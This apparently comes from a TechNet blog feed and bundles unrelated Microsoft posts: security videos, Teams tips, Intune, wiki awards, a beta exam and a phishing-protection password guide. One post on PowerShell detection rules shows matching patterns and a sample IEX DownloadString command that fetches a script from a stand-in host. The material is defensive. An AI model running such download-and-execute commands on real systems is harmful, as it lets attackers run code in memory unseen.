Channel: TechNet Blogs

Inside MSRC: Sharing Our Story & Customer Tips


For the last 20 years, the Microsoft Security Response Center has been an integral part of Microsoft’s commitment to customer security.  We are often called on to talk about the work we do and how customers can apply the lessons we have learned over that period to better their security posture.  Today we are releasing a series of videos that support that customer-driven story on our YouTube channel: https://www.youtube.com/playlist?list=PLXkmvDo4Mfut_ejSGJkLXDSUsH0uUtBC5.

 

 

This set of short video clips gives customers a glance into the commitment we put into our daily work and suggests ways they can incorporate similar principles into their work.  Security is a joint effort and together we can make a difference.

 

Videos released:

 

The Microsoft Security Response Center video delivers a brief introduction to the current state of cybersecurity and our team’s strategy, and emphasizes the importance of integrating a “better together” approach among cybersecurity organizations and researchers globally to help keep data and the online community safe. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Security Conferences video introduces some of the security conferences Microsoft speaks at, attends, and produces annually. Highlights include the benefits of bringing the security community together to discuss emerging security trends and how best to approach emerging security challenges. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Bug Bounty video highlights the important role security researchers play in the ecosystem and offers tips on how to increase the success of reporting vulnerabilities, preventing attacks, and receiving recognition and payment. Please learn more about our programs and how to engage with us at https://aka.ms/bugbounty.

 

The Security Vulnerability Engineering video shares some Microsoft cybersecurity best practices, such as investing in “red teams” and “blue teams,” and cybersecurity exercises to help your organization and customers stay ahead of evolving attack tactics. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Security Development Lifecycle video explores the importance of the SDL in addressing the need for more secure code, along with the Operational Security Assurance program, which addresses the need for more secure operations. Please learn more about our programs and how to engage with us at https://aka.ms/sdl.

 

The Defend the Cloud video offers tips that Microsoft’s cyberdefense teams use to increase cybersecurity in our extensive cloud environments, including the importance of investing in your people, platforms, and processes. Please learn more about our programs and how to engage with us at www.microsoft.com/msrc.

 

The Coordinated Vulnerability Disclosure video discusses the importance of discovering, reporting, and coordinating security vulnerabilities. It also offers tips on increasing the success of reporting vulnerabilities to and with Microsoft. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Industry and Government Security programs video explores the work of the Microsoft Active Protections Program and the Government Security Program. It explains how collaboration between industry partners and governments is critical to protecting customers worldwide. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

Phillip Misner,

Principal Security Group Manager

Microsoft Security Response Center

 

 


Security Monitoring–Additional PowerShell Detections


A colleague of mine turned me on to this particular article on ways to use PowerShell to bypass execution policies. It’s worth noting that PowerShell is a powerful tool that was designed to give a lot of flexibility to IT professionals and developers. That said, this type of tool can also be leveraged by the bad guys. As such, it makes sense to target certain types of behaviors that are not very common under normal circumstances, but can see elevated usage by threat actors as they move through your environments.

I’ve added four rules to the next version of Security Monitoring to alert on suspicious behavior. Three are (at least after initial rounds of testing) on by default. The fourth is off, and if noise is a problem, it will likely need to remain off. I also wouldn’t be surprised if more of these end up being turned off: PowerShell is used on the back end by a number of applications, so some of this activity may occur as normal behavior or by design in heavily scripted environments. In that case, you may need to turn these rules off altogether, or simply override them for particular machines. Even so, they can provide a nice defense-in-depth posture, and they will help the IA folks reviewing these alerts see what is actually going on in production and decide whether those practices should be rethought.

First, it goes without saying that you need process creation auditing turned on, as well as the GPO setting to include command line parameters in audit events. If you’re already following me or using this solution, you’ve probably already done this. For the record, I keep a public version of the GPOs I’m using here. These are simply auditing GPOs applied at the domain level. But it’s worth emphasizing that a lot of the detection built into this tool requires this auditing to be turned on.

Rule 1: PowerShell script run natively to bypass existing execution policy

In this particular rule, we’re looking for PowerShell scripts being run with a specific execution policy switch, which allows scripts to run regardless of execution policy settings. This can be by design in a user environment, so simply seeing it doesn’t mean that much. That said, I’m tracking 4688 events generated by ‘powershell.exe’ with the -ExecutionPolicy switch set to either Bypass or Unrestricted. This rule is on at the moment, but I could see it being shut off.
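As a rough sketch of what this rule matches (my own illustration in Python, not the actual Security Monitoring rule definition, and the script names are made up), the command-line test boils down to something like this:

```python
import re

# Hypothetical sketch: flag powershell.exe command lines, as captured in
# 4688 process creation events, that set -ExecutionPolicy to Bypass or
# Unrestricted.
PATTERN = re.compile(
    r"powershell(\.exe)?.*?-executionpolicy\s+(bypass|unrestricted)",
    re.IGNORECASE,
)

def is_policy_bypass(command_line: str) -> bool:
    return bool(PATTERN.search(command_line))

print(is_policy_bypass("powershell.exe -ExecutionPolicy Bypass -File script.ps1"))  # True
print(is_policy_bypass("powershell.exe -File script.ps1"))                          # False
```

The same logic would be expressed in SCOM as a rule filtering the CommandLine field of the 4688 event rather than as standalone code.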

Rule 2: PowerShell used to Invoke a Remote Expression

I would hope that this is not used with much frequency in a typical environment. Effectively, PowerShell can be leveraged to run remote code. Threat actors love this, as they can use their scripts to connect to an http/https share they have online and execute their custom malware. The best part (for them) is that they can run this in memory only, making it even harder for AV scanners to detect. Again, we are looking for 4688 events generated by PowerShell; I’m looking for the “DownloadString” method and an http or https pattern in the command line. I wouldn’t expect to see this one happen often, so for now, it’s on.
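Again purely as an illustration (the host and script names below are invented, and this is a sketch of the match logic rather than the shipped rule), the detection amounts to two patterns appearing in the same command line:

```python
import re

# Hypothetical sketch: a remote-expression invocation has both the
# DownloadString method and an http/https URL on the command line.
DOWNLOAD = re.compile(r"downloadstring", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)

def is_remote_expression(command_line: str) -> bool:
    return bool(DOWNLOAD.search(command_line) and URL.search(command_line))

cmd = ("powershell.exe -w hidden IEX "
       "(New-Object Net.WebClient).DownloadString('http://badhost.example/stage1.ps1')")
print(is_remote_expression(cmd))                               # True
print(is_remote_expression("powershell.exe -File local.ps1"))  # False
```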

Rule 3: PowerShell used to Invoke an Encoded Command

This is another one that I wouldn’t expect to see run that frequently. Basically, you can convert any text to a Base64-encoded string. This again can be normal, as it gets around formatting issues that can plague script writers, or people like me who aren’t PowerShell experts. With that said, however, the bad guys can use this to hide what they are doing from security software, AV, or security analysts. As such, this rule will generate an alert whenever PowerShell is run with the -enc or -EncodedCommand switches. Like the remote expression rule above, I don’t see this as something that will happen a lot, but it’s possible that it is legitimate.
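For context on what this rule is looking at: -EncodedCommand takes the command as Base64-encoded UTF-16LE text. This Python sketch (the sample command is my own) shows the round trip an analyst might perform when triaging one of these alerts:

```python
import base64

# PowerShell's -EncodedCommand switch expects the command as
# Base64-encoded UTF-16LE text; encode a command the way an attacker
# (or a legitimate script) would.
command = "Write-Output 'hello'"
encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
print(encoded)

# Decoding recovers the original command line for triage.
decoded = base64.b64decode(encoded).decode("utf-16-le")
print(decoded)  # Write-Output 'hello'
```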

Rule 4:  PowerShell Running Only in Memory

I had to turn this off in initial testing, as our own SQL management pack utilizes this feature. Simply put, the script runs in memory instead of on disk. It’s run using the -NoProfile or -NoP switches. I wouldn’t be surprised if SCOM MPs are generally an offender here, along with a lot of other applications that call PowerShell. As such, I’m not sure of the value of this rule, but since I took the time to write it, I’ll leave it in and leave it disabled. If you choose to enable it, be prepared to set overrides where applicable, or enable it only for a select few systems that need to be tightly monitored.

As always, if you want to test this, reach out to me on LinkedIn.

Update rollup for System Center Updates Publisher now available


We have released an update rollup for System Center Updates Publisher (SCUP). If you have ‘automatically check for available updates at startup’ enabled, the update will be offered automatically when you run SCUP. Otherwise, you can download it from the Microsoft Download Center here and install it manually.

For more information about this update, including the issues fixed, read KB 4462765 Update rollup for System Center Updates Publisher.

 

 

Connected Arms – Can AI Revolutionize Prosthetic Devices & Make them More Affordable?


Re-posted from the Azure blog channel

In an earlier post, we explored how several top teams at this year’s Imagine Cup had Artificial Intelligence (AI) at the core of their winning solutions. From helping farmers identify and manage crop disease to helping the hearing-impaired, this year’s finalists tackled difficult problems that affect people from all walks of life.

In a new post, we take a closer look at the champion project of Imagine Cup 2018, smartARM.

See how the unexpected combination of a 3D-printed prosthetic arm, a camera embedded in its palm, cloud connectivity and easy access to state-of-the-art AI algorithms allowed a team of undergraduate students from Canada to accomplish something rather remarkable.

Learn more by clicking the link that follows.

We are just scratching the surface in terms of the types of medical and healthcare breakthroughs that may result from the application of AI.

As Joseph Sirosh, Corporate Vice President and CTO of AI at Microsoft, rightly puts it, “Imagine a future where all assistive devices are infused with AI and designed to work with you. That could have tremendous positive impact on the quality of people’s lives, all over the world.”

You can read the full "Connected Arms" post at this link.

ML Blog Team

Best Practices for Microsoft Teams Descriptions (or, don’t truncate th…


As a Microsoft employee I've been "dogfooding" our new chat-based collaboration hub (Microsoft Teams) for a while now and pretty much enjoying the experience throughout. In the interest of knowledge sharing and wanting to be generally useful, I'd like to raise a usability/discoverability best practice that just materialized for me.

As I was searching for a specific Team to join, I noticed that, in the search results, several teams had issues with their descriptions. Some had no description, others a sub-optimal one, and finally others had a description that looked like it might have been useful, but was cut off prematurely in the Teams UI. Since we at MS have lots and lots of teams, it's vitally important to know what exactly the purpose of the team is - especially a private team (as I wouldn't be able to browse its content until I'm allowed in).

So I humbly propose a quick checklist for creating useful Microsoft Teams descriptions:

  1. Actually populate the description (!)
  2. Put useful info in there. Remember, folks might be browsing through tens or hundreds of teams trying to find relevant chats and content. Don't make them guess!
  3. (And this is the big one) place that useful info at the start of the team description. Like, right at the start. Why? Read on...

You see, in the Teams search UI (at least at the time this post was written), the description gets truncated, and unlike the team name, it doesn't expand in a tooltip when you mouse over the description - rather the text changes to a "Join team" button.

So since it seems we currently only have about 80 characters or so to offer a descriptive preview of our team on the search results UI, we shouldn't waste characters at the start of the description, but instead get right to the point! For example, I see a lot of descriptions starting with  “This is a Microsoft Team for the hosting of content for…” Well, we already know it’s a Team. And by design, it hosts content… So our description isn't providing anything useful so far.

Instead, folks would be much better served with a description that starts right away by providing the most useful, unique info, e.g. “For automotive enthusiasts…”, “Expense support and discussions…” or "Only for members of the xyz project..." We can get into the fluffy details later on in the description if we want, as it won't matter as much if this other stuff gets cut off. Again, while this strategy could prove valuable for all teams, it's especially important for private teams (assuming you can search private teams in your tenant; this might still be in preview/testing). I don't want to waste my or the team owner's time by requesting access to a team that I'm not actually interested in (or shouldn't be a member of)…!
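The effect of front-loading can be sketched in a few lines of Python; note that the 80-character figure is the approximate cutoff observed in the Teams search UI, not a documented limit, and the sample descriptions are invented:

```python
# Approximate truncation length observed in the Teams search results UI.
PREVIEW_LEN = 80

def preview(description: str) -> str:
    """Simulate how the search results pane truncates a team description."""
    if len(description) <= PREVIEW_LEN:
        return description
    return description[:PREVIEW_LEN].rstrip() + "..."

bad = ("This is a Microsoft Team for the hosting of content for the "
       "community of automotive enthusiasts across the company")
good = ("Automotive enthusiasts across the company: meetups, photos, and "
        "buying advice. General chat welcome.")

print(preview(bad))   # the useful part never makes it into the preview
print(preview(good))  # the key information survives truncation
```

Running this, the "bad" preview spends its entire budget on boilerplate, while the "good" preview gets the unique information in front of the searcher before the cut.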

To sum up...

Bad description:

[screenshot]
Good description:

Microsoft 365 Blog Roundup (August 2018) [Updated 9/8]

Microsoft 365 is an intelligent solution that combines Office 365, Windows 10, and Enterprise Mobility + Security. It creates an environment where people can work securely, and empowers everyone who works.

The Office Blog has evolved into the Microsoft 365 Blog. Alongside the English-language Microsoft 365 Blog and the partially translated Japanese Microsoft 365 Blog, the original Office Blogs will continue to run for a while. Going forward, product updates will be posted primarily to the Microsoft 365 Blog, so please bookmark it and check back regularly!

<<Recent updates>>

2018/08/31: New to Microsoft 365 in August — tools to achieve more in the modern workplace (English)

Microsoft 365 is a comprehensive, intelligent solution that includes the Office 365 apps and services together with Enterprise Mobility + Security and Windows 10 Pro. For details on the individual Microsoft 365 products, see Office 365 | Windows 10 | Enterprise Mobility + Security. For details on this month's new features for Office 365 subscribers, see What's new in Office for Windows desktop | What's new in Office for Mac | What's new in Office Mobile for Windows | What's new in Office for iPhone and iPad | What's new in Office for Android. Business customers on the Monthly Channel and Semi-Annual Channel can get early access to fully supported builds through Targeted Release (client services). For details on when the features introduced here become available, see "When do I get the newest features for Office 2016 for Office 365?".

Recently, a roundup of each month's major new features has been published at the end of the month, which is a convenient way to get a quick overview.

Also available (in English) is a video rundown of the updates, so please take a look. (It is updated around the 8th of each month, US time.)

To browse past roundups, see the Office Blogs tag.

To browse roundups of the latest product information, see the Latest Updates tag.

 

 

Microsoft 365 Business Tech Series Videos – iOS and Android Management


In late June I was approached to record some short technical overview videos on Microsoft 365 Business, and now that they are recorded and published, it’s time to review them, and provide some additional resources and any important updates since the content was created. This is the sixth video in the series, and the focus is on Intune's iOS and Android management capabilities.

With the initial release of Microsoft 365 Business, one of the benefits it provided for iOS and Android was a set of easy-to-deploy Mobile Application Management (MAM) policies. You could configure these directly from the Microsoft 365 Business Admin Center, and they exposed a subset of the apps and MAM policies that Intune supported. The exposed policies and supported mobile apps aligned with the goals of Microsoft 365 Business, and they did a good job of simplifying the experience.

MAM policies on iOS and Android are a great way of controlling what can happen with company data within an application, but in most conversations I have about Intune, I generally encourage customers to use this approach for Bring Your Own Device (BYOD) scenarios. This way the organisation controls its data, but the user owns the device. The IT department can't reset or wipe the phone, only the data related to the user's work profile. For an individual bringing their own phone or tablet to work, this is a great solution.

However, if it's a device the company has provided, they may want control at the device level with MDM, not just MAM. While the full Intune functionality was visible in the Azure Portal, that component wasn't licensed for use. The good news is that with the April 2018 release the licensing was updated, and full Intune capabilities are now included. While you won't see any changes for iOS and Android policies in the Admin Center at this point in time, if you are comfortable with Intune then it's simply a matter of using Intune in Azure as usual.

What this now means is that it's really up to you to decide which approach to take. If you think MAM policies are enough, start with the native M365B capabilities, and then take a look in Intune to see what is happening under the covers, just in case there are some changes that you want to make. I don't recommend making changes in Intune to the Admin Center policies you create; instead, create a policy that duplicates the settings you want, and add the customisations that make sense.

You can check out the other posts in this series below

Microsoft 365 Business Tech Series Videos – Partner Overview

Microsoft 365 Business Tech Series Videos – Assessing Existing Environments

Microsoft 365 Business Tech Series Videos – Cloud Identity

Microsoft 365 Business Tech Series Videos – Hybrid Identity

Microsoft 365 Business Tech Series Videos – Workload Migration

Breaking Into Windows Server 2019: Network Features: Azure Network Adapter


Happy Saturday to our outstanding readers! Brandon Wilson here with a pointer to some more of the new networking features in Windows Server 2019 coming to you straight from the Windows Core Networking team!

In this week's posting, the discussion surrounds something whose importance will become more and more visible over time: the Azure Network Adapter. Here is an excerpt straight from the product group:

"Top 10 Networking Features in Windows Server 2019: #3 Azure Network Adapter

https://blogs.technet.microsoft.com/networking/2018/09/05/azurenetworkadapter/

More and more on-premises workloads require connectivity to Azure resources.  Connecting these on-premises workloads to their Azure resources traditionally requires an Express Route, Site-to-Site VPN, or Point-to-Site VPN connection.  Each of these options require multiple steps and expertise in both networking and certificate management, and in some cases, infrastructure setup and maintenance.

Now, Windows Admin Center enables a one-click experience to configure a point-to-site VPN connection between an on-premises Windows Server and an Azure Virtual Network.  This automates the configuration for the Azure Virtual Network gateway as well as the on-premises VPN client. Windows Admin Center and the Azure Network Adapter makes connecting your on-premises servers to Azure a breeze!"

As always, if you have comments or questions on the post, your most direct path for questions will be in the link above.

Thanks for reading, and we'll see you again next week!

Brandon Wilson


Top Contributors Awards! Network Device Enrollment Service (NDES), How to load a partial view and many more!


Welcome back for another analysis of contributions to TechNet Wiki over the last week.

First up, the weekly leader board snapshot...

As always, here are the results of another weekly crawl over the updated articles feed.

 

Ninja Award Most Revisions Award
Who has made the most individual revisions

 

#1 George Chrysovaladis Grammatikos with 101 revisions.

 

#2 HansamaliGamage with 64 revisions.

 

#3 Richard Mueller with 61 revisions.

 

Just behind the winners but also worth a mention are:

 

#4 Peter Geelen with 40 revisions.

 

#5 Bijay Kumar Sahoo with 35 revisions.

 

#6 Arleta Wanat with 32 revisions.

 

#7 Dave Rendón with 24 revisions.

 

#8 Subhro Majumder with 12 revisions.

 

#9 RajeeshMenoth with 10 revisions.

 

#10 Nelson Thomas with 10 revisions.

 

 

Ninja Award Most Articles Updated Award
Who has updated the most articles

 

#1 Richard Mueller with 48 articles.

 

#2 Bijay Kumar Sahoo with 31 articles.

 

#3 Dave Rendón with 13 articles.

 

Just behind the winners but also worth a mention are:

 

#4 Peter Geelen with 13 articles.

 

#5 Carsten Siemens with 9 articles.

 

#6 Arleta Wanat with 9 articles.

 

#7 George Chrysovaladis Grammatikos with 6 articles.

 

#8 RajeeshMenoth with 6 articles.

 

#9 pituach with 2 articles.

 

#10 Nelson Thomas with 2 articles.

 

 

Ninja Award Most Updated Article Award
Largest amount of updated content in a single article

 

The article to have the most change this week was Active Directory Certificate Services (AD CS): Network Device Enrollment Service (NDES), by Kurt L Hudson MSFT

This week's reviser was Stefan Telvian [MSFT]

 

Ninja Award Longest Article Award
Biggest article updated this week

 

This week's largest document to get some attention is BizTalk : Analysis of Direct Mapping vs XDocument Pipeline vs Streaming Pipeline To Process Large Messages for SQL Bulk Insert, by Mandar Dharmadhikari

This week's reviser was Richard Mueller

 

Ninja Award Most Revised Article Award
Article with the most revisions in a week

 

This week's most fiddled with article is ASP.NET Core MVC: How to load a partial view, by HansamaliGamage. It was revised 53 times last week.

This week's revisers were HansamaliGamage & George Chrysovaladis Grammatikos

 

Ninja Award Most Popular Article Award
Collaboration is the name of the game!

 

The article to be updated by the most people this week is TechNet Guru Competitions - September 2018 , by Peter Geelen

This week's revisers were George Chrysovaladis Grammatikos, Kareninstructor, Vincent Maverick Durano, Stoyan Chalakov, pituach, [Kamlesh Kumar] & Subhro Majumder

 

The article to be updated by the second most people this week is Windows 10 Troubleshooting: “Microsoft Store is blocked” Error Code: 0x800704EC, by S.Sengupta

This week's revisers were RajeeshMenoth, Richard Mueller, Peter Geelen, Dave Rendón & S.Sengupta

 

Ninja Award Ninja Edit Award
A ninja needs lightning fast reactions!

 

Below is a list of this week's fastest ninja edits. That's an edit to an article made shortly after another person's edit.

 

Ninja Award Winner Summary
Let's celebrate our winners!

 

Below are a few statistics on this week's award winners.

Most Revisions Award Winner
The reviser is the winner of this category.

George Chrysovaladis Grammatikos

George Chrysovaladis Grammatikos has won 17 previous Top Contributor Awards. Most recent five shown below:

George Chrysovaladis Grammatikos has not yet had any interviews, featured articles or TechNet Guru medals (see below)

George Chrysovaladis Grammatikos's profile page

Most Articles Award Winner
The reviser is the winner of this category.

Richard Mueller

Richard Mueller has been interviewed on TechNet Wiki!

Richard Mueller has featured articles on TechNet Wiki!

Richard Mueller has won 234 previous Top Contributor Awards. Most recent five shown below:

Richard Mueller has TechNet Guru medals, for the following articles:

Richard Mueller's profile page

Most Updated Article Award Winner
The author is the winner, as it is their article that has had the changes.

Kurt L Hudson MSFT

Kurt L Hudson MSFT has been interviewed on TechNet Wiki!

Kurt L Hudson MSFT has featured articles on TechNet Wiki!

Kurt L Hudson MSFT has won 8 previous Top Contributor Awards. Most recent five shown below:

Kurt L Hudson MSFT has not yet had any TechNet Guru medals (see below)

Kurt L Hudson MSFT's profile page

Longest Article Award Winner
The author is the winner, as it is their article that is so long!

Mandar Dharmadhikari

Mandar Dharmadhikari has been interviewed on TechNet Wiki!

Mandar Dharmadhikari has won 3 previous Top Contributor Awards:

Mandar Dharmadhikari has TechNet Guru medals, for the following articles:

Mandar Dharmadhikari has not yet had any featured articles (see below)

Mandar Dharmadhikari's profile page

Most Revised Article Winner
The author is the winner, as it is their article that has been changed the most

HansamaliGamage

Hansamali has been interviewed on TechNet Wiki!

Hansamali has won 20 previous Top Contributor Awards. Most recent five shown below:

Hansamali has TechNet Guru medals, for the following articles:

Hansamali has not yet had any featured articles (see below)

Hansamali's profile page

Most Popular Article Winner
The author is the winner, as it is their article that has had the most attention.

Peter Geelen

Peter Geelen has been interviewed on TechNet Wiki!

Peter Geelen has featured articles on TechNet Wiki!

Peter Geelen has won 230 previous Top Contributor Awards. Most recent five shown below:

Peter Geelen has TechNet Guru medals, for the following articles:

Peter Geelen's profile page

 

S.Sengupta

S.Sengupta has won 4 previous Top Contributor Awards:

S.Sengupta has not yet had any interviews, featured articles or TechNet Guru medals (see below)

S.Sengupta's profile page

Ninja Edit Award Winner
The author is the reviser, for it is their hand that is quickest!

Dave Rendón

Dave Rendón has been interviewed on TechNet Wiki!

Dave Rendón has won 57 previous Top Contributor Awards. Most recent five shown below:

Dave Rendón has TechNet Guru medals, for the following articles:

Dave Rendón has not yet had any featured articles (see below)

Dave Rendón's profile page

 

Another great week from all in our community! Thank you all for so much great literature for us to read this week!

Please keep reading and contributing, because Sharing is caring..!!

 

Best regards,
— Ninja [Kamlesh Kumar]

 

Monitor & protect your data in ALL your clouds, NOW!


Think your organization is operating in a secure and compliant manner? After you answer the following questions, you might want to keep reading...

  • How do you ensure your sensitive data is protected across all the clouds in your environment, whether it's Office 365, G Suite, Box, Salesforce, etc.?
  • Do you have a single-pane-of-glass view of when someone shares a file from one of those clouds with someone outside the organization?
  • What about login traffic to those cloud apps?
  • Do you have visibility into your shadow IT, and do you understand which apps in the environment are storing data overseas or aren't compliant with an industry regulation such as HIPAA or GDPR?

Watch the following 3-minute video for an overview of Cloud App Security in Microsoft 365 - this is the tool that will make you the hero in your organization and help ensure you operate in a secure and compliant manner! Questions? Leave a comment below!

Technical documentation and how to configure what I show in the video for Cloud App Security can be found here.

Why you should enable MFA RIGHT NOW!

New Beta Exam! 70-777: Implementing Microsoft Azure Cosmos DB Solutions [Updated 9/9]

(This article is a translation of New Beta Exam! 70-777: Implementing Microsoft Azure Cosmos DB Solutions, published on the Microsoft Learning blog on August 17, 2018. For the latest information, please refer to the original article.)

A new exam is now available for developers and architects who use Azure Cosmos DB. It tests your understanding of the fundamental concepts of partitioning, replication, and resource governance for building and configuring scalable applications independent of any particular Cosmos DB API, as well as your working knowledge of the Cosmos DB SQL API. It also includes hands-on items covering the design, build-out, and troubleshooting of Cosmos DB solutions that meet business and technical requirements.

We are inviting 300 people to take the beta version of Exam 70-777 at a special price. If you register for the exam on or after August 17, 2018, you receive an 80% discount on the exam fee (for background on why beta exams are no longer free, see this blog post (English)). Seats are offered on a first-come, first-served basis, and you must register for and take the exam by October 1, 2018. Taking the exam as early as possible lets us use your comments, feedback, and exam data to evaluate the quality of the questions; the earlier you take it, the more likely your feedback can be incorporated into improving the exam. This is your chance to influence the questions included when the exam goes live. Scores will be recalculated when the exam becomes generally available, and final scores will be released about 10 days after that. Follow @libertymunson on Twitter for announcements about score recalculation. For the schedule of beta score calculation and general availability, see the blog posts "The Path from Beta Exam to Live Exam" and "More Tips About Beta Exams".

To prepare for the exam, review the exam preparation guide and practice the skills listed there. If you need more tips, see the blog post on preparing for beta exams (English). ***To receive the 80% discount, enter code 70-777-PANURGIC on the payment information page when you register. This is not a private access code. The code is valid only for exam dates on or before October 1, 2018. Again, the number of seats at the special price is limited. The code cannot be used in some countries (including Turkey, Pakistan, India, China, and Vietnam), where the beta exam is not available. Finally, because this is a beta exam, scores are not calculated immediately; your final score and pass/fail result will be available after the exam becomes generally available.

 

 

 

Email Phishing Protection Guide – Part 13: Update Your User Identity Password Strategy


The Email Phishing Protection Guide is a multi-part blog series written to walk you through the setup of many security focused features you may already own in Microsoft Windows, Microsoft Office 365, and Microsoft Azure. By implementing some or all these items, an organization will increase their security posture against phishing email attacks designed to steal user identities. This guide is written for system administrators with skills ranging from beginner to expert.

Introduction: Email Phishing Protection Guide - Enhancing Your Organization's Security Posture

Part 1: Customize the Office 365 Logon Portal

Part 2: Training Users with the Office 365 Attack Simulator

Part 3: Deploy Multi Factor Authentication (MFA)

Part 4: Deploy Windows Hello

Part 5: Define Country and Region Logon Restrictions for Office 365 and Azure Services

Part 6: Deploy Outlook Plug-in to Report Suspicious Emails

Part 7: Deploy ATP Anti-Phishing Policies

Part 8: Deploy ATP Safe Link Policies

Part 9: Deploy ATP Safe Attachment Policies

Part 10: Deploy and Enforce Smart Screen for Microsoft Edge, Microsoft Internet Explorer and Google Chrome

Part 11: Monitor Phishing and SPAM Attacks in Office 365

Part 12: Discover Who is Attacking Your Office 365 User Identities

Part 13: Update Your User Identity Password Strategy

 

Part 13: Update Your User Identity Password Strategy

Earlier in this blog series, I highlighted how often the Office 365 identities in your tenant may be attacked by providing steps to view the information. While I also outlined in Part Three of this series how important and strongly recommended it is to enable Multi Factor Authentication (MFA) for all your users, what if you do not yet have this feature in place? What if your organization has not yet embraced MFA and instead has chosen to continue with a username and password approach? How can this strategy be enhanced to increase security?

For decades, the strategy about password policies has included items such as:

  • Change a password every 30 days
  • Require complexity in passwords
  • Force passwords to be 9, 10, or more characters in length

What if I were to tell you that these are no longer recommended based on research done in recent years? Yes, this was a bit of a shock to me when I first started looking into this as well. After all, this is how password policies have been set in my 25+ years of experience in system design and administration. With new threats evolving each day, it is imperative to the security of your organization that you understand why the policies mentioned above (while still better than nothing) are no longer recommended, as well as what is now recommended and why.

Before we get into recent research about passwords, let's look at how people have been using passwords for years. Consider some of your first uses of computer passwords. Perhaps it was for your first CompuServe account, Prodigy account, or perhaps a Blockbuster account. You had a username and password in that former age of dial-up modem Internet connections. Chances are you used something simple to remember. For example, suppose your favorite animal was a lion - so you had a password of lion on these first types of accounts. As time went on, you signed up for more accounts on your favorite travel website, for your local grocery store, your favorite hotel chain, and many more we can all identify with. Chances are, that same password or some variant of it is still being used on modern websites and for your work account. Perhaps it evolved to Lion with a capital L, or Lion5 because you are incrementing numbers, or Lion091879 because that is your birthday, or perhaps Lion091879!# because your employer or your bank website now requires special characters in a password.

Now consider your username at work. It is probably some variant of your first name and last name. Don Smith's username could be Dsmith@domain.com or DonS@domain.com or Don.Smith@domain.com. Something that is common and easily guessed.
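To see just how predictable these habits are, here is a toy Python sketch (not from the original post; the seed word, birthday, and names are the invented examples above) that enumerates the kinds of username formats and password variants an attacker's algorithm might try:

```python
from itertools import product

# Hypothetical seed data an attacker might gather (all values invented)
years = ["", "5", "091879"]      # increments and a birthday
suffixes = ["", "!", "!#"]       # special characters added to satisfy policies

def variants(word):
    """Enumerate predictable mutations of a single seed word."""
    for base in (word, word.capitalize()):
        for year, suffix in product(years, suffixes):
            yield base + year + suffix

def username_formats(first, last, domain):
    """Common corporate username patterns for one person."""
    f, l = first.lower(), last.lower()
    return [f"{f[0]}{l}@{domain}",          # dsmith@domain.com
            f"{f}{l[0].upper()}@{domain}",  # donS@domain.com
            f"{f}.{l}@{domain}"]            # don.smith@domain.com

guesses = list(variants("lion"))
print(guesses[:4])   # ['lion', 'lion!', 'lion!#', 'lion5']
print(username_formats("Don", "Smith", "domain.com"))
```

Eighteen guesses from one seed word; real tooling works from far larger wordlists and mutation rules, which is why "Lion091879!#" buys so little extra security.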

As a security professional reading this, you may know better than to use a password strategy like the one outlined above. But keep in mind, your users are not nearly as concerned with network security. They are likely doing the minimum required to satisfy the password requirements you have had in place for years. And they are using the same or a similar password on your network as on every other personal account they have, so they do not need to remember 50 different passwords. We are all human and will try to keep things simple.

Now consider an email phishing attack and then the logon attacks you now see after following the steps in Part 12 of this blog series.

Let's say an email phishing attack was successful and a user entered his/her username and password. The attacker was able to log on to this identity because you did not have MFA enabled (hint: enable MFA). Although you were able to quickly identify the breach and force a password change on the account before any apparent damage was done, the attacker was able to get a few key pieces of information for a new targeted attack:

  • The user who fell victim to the phishing email entered a username using the format used throughout your environment. The attacker now knows this format, providing a key piece of information.
  • The attacker was able to harvest your user directory. He or she now knows the username and email address of everyone in your organization. Perhaps he or she knows the job titles of each person as well if that field is populated in your directory, including individuals who are managers or part of the executive leadership team. Algorithms can now be adjusted for a spear phishing attack against these high value identities with a much higher likelihood of success.

Although the attack and breach was quickly identified and remediated, the attacker can now launch a more targeted attack. Certainly the attacker will continue with an email phishing campaign, but with detailed information now known about your organization the attacker can be much more targeted. Consider the attack scenarios that can now be used:

  • With a directory of your users now in the hands of an attacker, names can be researched on social media sites to find out more about each person. Algorithms can then be adjusted to include passwords that may include (using our example above) your favorite animal with a combination of special characters and capitalization. If you can think of the potential password combinations, the algorithms are designed to try them as well. This type of attack can go on for weeks, months, years, but the probability of a successful password guess grows higher each day.
  • With additional information learned from social media sites about your users, an attacker could determine where each user has other accounts. Although your organization may have fortified its network defenses in various ways, consider this: 'have these social media sites done the same?' An attacker could start logon attempts at these social media sites using the user email addresses discovered in the original attack and again start to guess passwords there with information now known. A successful password guess on one of those sites is now just another clue to a successful password into your organization. If an attacker successfully guessed you are using Lion42 as your password in a social media site, algorithms can then be further fine-tuned to try variants on the identities used at the primary attacker's target.

The list of these scenarios goes on and on. Remember that these attackers are smart, very smart. This is about money to them, and many are running it as a business with great resources and intelligent software developers. A nation-state sponsored attack has even more, almost unlimited, resources. They all have all the time in the world to guess usernames and passwords. With each additional data point known about an organization, a successful breach becomes easier.

A New Password Strategy:

With all of this in mind, what can you do? First, keep in mind that these types of attacks are not just for cloud identities, but for any identity hosted anywhere - on-premises or in any cloud vendor environment. Also consider that cloud environments gather attack intelligence from millions of ongoing attacks and use them to help fortify and adjust the security of the environments. For Microsoft, we see more than 10 million attacks involving passwords each day (reference). This is far more telemetry than any on-premises system can provide and far more than most other vendors can gather. The information is analyzed and mitigations quickly enabled, making a cloud environment the safest infrastructure available for your organization and data. See more information about the Microsoft Intelligent Security Graph here.

Microsoft Research has published a detailed whitepaper describing the volume and types of attacks Microsoft sees and learns from each day. These attacks never stop and are only growing. I recommend you take a few minutes to review the research and recommendations in this whitepaper. Then, I recommend you implement many, if not all of these recommendations in your organization. Remember that you cannot simply enable these recommendations. You will need leadership support, a communication plan to your users about why you are making this change and what they can expect, and then plan how you will test and pilot these new policies.

The first part of this effort is often the most challenging - gaining leadership support. In your presentation to leadership, use the telemetry in the Microsoft Research whitepaper AND collect your own data from Part 12 in this blog series. Make your presentation real with data about attacks your organization has against it every day and remind your audience that a breach is just a user click away from a well-crafted phishing email.

From the Microsoft Research whitepaper on password guidance, below is advice offered for policies to enable in your organization using both Azure Active Directory and Active Directory:

